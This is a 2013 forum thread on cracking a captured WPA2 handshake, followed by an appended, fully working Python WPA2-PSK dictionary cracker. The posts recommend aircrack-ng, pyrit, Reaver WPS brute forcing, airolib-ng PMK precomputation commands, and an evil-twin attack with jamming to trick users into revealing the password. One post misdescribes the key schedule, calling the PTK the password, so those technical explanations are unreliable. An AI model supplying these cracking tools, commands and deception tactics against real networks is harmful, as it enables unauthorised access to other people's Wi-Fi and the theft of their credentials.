WPA/WPA2 PSK Brute Forcing Dictionary Files



Post by CaptianMadJacks on Sun Oct 20, 2013 8:24 pm

So I've been working on this problem for quite some time. I'm trying to brute force a WPA2 handshake using a CCMP cipher from a .cap obtained from my router using airodump-ng, and I am positive that I captured the correct handshake. Where I am stuck is at brute forcing the password out of the .cap file. I have access to a whole lot of processing power and have processed the entire 14 GB dictionary file I found online (took about two days), but no luck on cracking the WPA handshake to get the PSK. I was trying to get my hands on the Church of Wi-Fi's 33 GB dictionary file, but it appears their website isn't functioning properly, and the torrent that they set up for the 33 GB file was hosted by ISO Hunt, which is no longer available; that may have to do with ISO Hunt's current legal troubles.

I've also been trying out different cracking tools. I originally started out with aircrack-ng, but I've just switched my brute forcing program to pyrit. Aircrack-ng appears to have better speed when cracking passwords, but maybe I'm just using pyrit incorrectly. Does anyone have a preference between the two, or have you found a better brute forcing program?

Main questions
• Any advice on finding a new password dictionary file, or locating a copy of the Church of Wi-Fi's file online somewhere? (And yes, I'm aware of Google and have been using it.)
• Any suggestions on brute forcing programs?
• Is there something I'm missing here?


Re: WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by WallShadow on Sun Oct 20, 2013 10:17 pm

1. Password dictionaries aren't the only thing you could use. You can use pre-computed rainbow tables to attack the encryption. See if you can't find any rainbow tables for WPA(2) passwords (possibly a pre-computed airbase database, or various other rainbow table files).
2. Get your existing password files and pass them through John the Ripper to generate many more passwords. With default settings, it will probably expand your 14 GB file to 100 GB or more.
3. Try using Reaver. It's a brute forcing tool which attacks WPS on WPA(2) routers. It can take some time, perhaps even days, but it will eventually break it if it has WPS enabled.
4. Perform an evil-twin attack against the network (you might need to disconnect users or even jam the frequency to get it to work), and solicit the password from any stupid users.

<3


Re: WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by FlyingWarrior on Sun Oct 20, 2013 10:22 pm

I personally use aircrack-ng; as you already stated, the speed on password cracking seems to be a lot better than other programs out there, especially when tied into a computer with decent processing power.

As for a dictionary file, I tend to formulate my own for different situations. I have several "fast" files that quickly scan through common passwords if you need to attempt to crack something under a time constraint. I have several other files specific to certain attacks, full of possible passwords that have a more intimate involvement with the attack I am initiating. Then finally I have the "phonebook" file of every possible password from the other attacks, along with an enormous number of possible permutations of a given password, for when time is not of the essence.

I recommend you just experiment with creating a few different files for any given situation.

And if I come across the Church of Wi-Fi's file I will make sure to PM you; personally I wouldn't mind adding it to my collection as well.


Re: WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by CaptianMadJacks on Tue Oct 22, 2013 9:44 pm

WallShadow, great advice. I originally started this using Reaver and went at it for weeks, but with no luck, and I've read everything I can get my hands on online. As I understand it, Reaver can take a long time to get a feel for, and results vary from router to router (depending on make and model). The evil twin attack is genius; I hadn't thought of using that method this way before. Do you think using the mdk3 utility for sending the authentication broadcasts repeatedly will work for jamming?

I do know some characteristics of the password, such as that it's 16 characters long and made up of a random set of numbers and capital letters only, no lowercase. I've heard 16 character passwords are somewhere near impossible to crack; any thoughts on how long it might take, or if it's even possible (without taking 10 years)?


Re: WPA/WPA2 PSK Brute Forcing Dictionary Files

Post by limdis on Wed Oct 23, 2013 11:29 am

Hmm hmm. Double check to ensure you have a complete 4-way handshake. You mentioned using pyrit, so run this and tell us what you see.

Code:
    pyrit -r <.cap file> analyze


As for your crack speeds: yes, aircrack-ng is faster than pyrit (and coWPAtty) running simple cracks. If you want to get some serious speed running your dictionaries (800k+/s) you need to create your own rainbow table with precomputed pairwise master keys (PMKs). Before I confuse you, let me explain:

When you run aircrack-ng you will notice the output is broken into 3 parts; the first two are the main parts to focus on. The "Master Key" is the pairwise master key. It is derived from the ESSID using the PBKDF2 algorithm. Basically, it takes a long-ass time to compute. This is the very reason it takes so long to crack WPA(2) encryption.

The basic process:
Word from dictionary + encryption algorithm > PMK > Private Transient Key (PTK, aka: the password) > plain text password

This has to be done for every single entry in your dictionary. Now, what I mentioned before: the PMKs are always the same, so why waste the time computing them for every single entry if you don't have to? There is one downside to this method that you should know. Precomputing PMKs from your dictionaries and saving them to a table is a VERY slow process. However, once it is done, it is done. That said, this rainbow table will only work on handshakes that were captured with the same ESSID that you used. To the blackhats out there, this will waste your time.

Code:
    # echo <ESSID> > targetessid.txt
    # airolib-ng <database name> --import essid targetessid.txt
    # airolib-ng <database name> --import passwd <wordlist>
    # airolib-ng <database name> --batch
    # airolib-ng <database name> --stats    # ensure it reports 100%
    # aircrack-ng -r <database name> <.cap>


But I got sidetracked. Tell us if you have a genuine 4-way handshake first.
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
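As an added worked example (not code from this thread, nor from aircrack-ng, pyrit or airolib-ng), the Python below implements the key schedule limdis's post walks through and the airolib-ng precomputation idea in one place: PBKDF2-HMAC-SHA1 over the passphrase with the ESSID as salt (4096 iterations) gives the PMK; PRF-512 expands the PMK, both MAC addresses and both nonces into the PTK; the first 16 bytes of the PTK (the KCK) key the HMAC-SHA1 MIC on message 2 of the handshake, which is what a dictionary attack actually verifies. The handshake it cracks is constructed inside the script, not a real capture: the ESSID "HomeNet", the passphrase, the MACs, the nonces and the wordlist are all made up. It also carries the keyspace estimate for the 16-character uppercase-plus-digit password asked about earlier in the thread, at the 800k PMK/s rate quoted in this post.

```python
"""WPA2-PSK dictionary attack against a 4-way handshake.

Added example: not code from the thread, aircrack-ng, pyrit or airolib-ng.
Key schedule per IEEE 802.11i: PBKDF2 -> PMK, PRF-512 -> PTK, HMAC-SHA1 -> MIC.
"""
import hashlib
import hmac
import struct
from typing import Optional

PBKDF2_ITERATIONS = 4096   # fixed by the standard; this is what makes WPA cracking slow
MIC_OFFSET = 81            # 4-byte 802.1X header + 77 bytes into the EAPOL-Key body
MIC_LEN = 16


def pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(),
                               PBKDF2_ITERATIONS, 32)


def ptk(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + bytes(MIC_LEN) + eapol[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack(hs: dict, wordlist, pmk_cache: Optional[dict] = None):
    """Try each word; return the passphrase whose derived KCK reproduces the captured MIC.

    pmk_cache is the airolib-ng idea: the PMK depends only on (ESSID, passphrase), so it
    can be computed once per ESSID and reused against every handshake from that network.
    """
    for word in wordlist:
        key = (hs["essid"], word)
        if pmk_cache is not None and key in pmk_cache:
            candidate = pmk_cache[key]
        else:
            candidate = pmk(word, hs["essid"])       # the expensive step
            if pmk_cache is not None:
                pmk_cache[key] = candidate
        kck = ptk(candidate, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if eapol_mic(kck, hs["eapol"]) == hs["mic"]:
            return word
    return None


def build_msg2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """EAPOL-Key frame shaped like handshake message 2, MIC field zeroed."""
    key_info = 0x010A   # descriptor version 2 (HMAC-SHA1), pairwise, MIC bit set
    body = (b"\x02"                                     # descriptor type: RSN
            + struct.pack(">HHQ", key_info, 0, 1)       # key info, key length, replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, IV, RSC, ID
            + bytes(MIC_LEN)                            # MIC placeholder
            + struct.pack(">H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack(">H", len(body)) + body   # 802.1X v2, EAPOL-Key


def make_capture(passphrase: str, essid: str) -> dict:
    """Constructed handshake (not a real capture): fixed MACs/nonces, MIC from the true key."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    frame = build_msg2(snonce)
    kck = ptk(pmk(passphrase, essid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]
    return {"essid": essid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": frame, "mic": mic}


def years_to_exhaust(charset_size: int, length: int, pmks_per_second: float) -> float:
    """Worst-case time to try every password of a random keyspace at a given PMK rate."""
    return charset_size ** length / pmks_per_second / (365.25 * 24 * 3600)


if __name__ == "__main__":
    cap = make_capture("correct horse", "HomeNet")      # made-up ESSID and passphrase
    cache = {}
    print("found:", crack(cap, ["letmein", "Password1", "correct horse"], cache))
    print("cached PMKs for HomeNet:", len(cache))
    # 16 chars of A-Z0-9 at the 800k PMK/s mentioned in the thread:
    print("years to exhaust 36^16:", f"{years_to_exhaust(36, 16, 800_000):.2e}")
```

Before trusting pmk() on a real capture, check it against the IEEE 802.11i Annex H test vector: passphrase "password" with SSID "IEEE" must give a PMK starting f42c6fc5. On a real .cap you pull the ESSID and both MACs from the beacon/association, ANonce from message 1, and SNonce, the full EAPOL frame and its MIC from message 2; a capture that lacks either message (what pyrit's analyze checks) cannot be cracked no matter how good the wordlist is. The cache dict is all an airolib-ng database amounts to: it is keyed by ESSID, so the precomputed PMKs are useless against any other network name, and at 36^16 candidates the keyspace estimate comes out in the hundreds of billions of years at 800k PMK/s, which is why a truly random 16-character key is not a dictionary problem.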


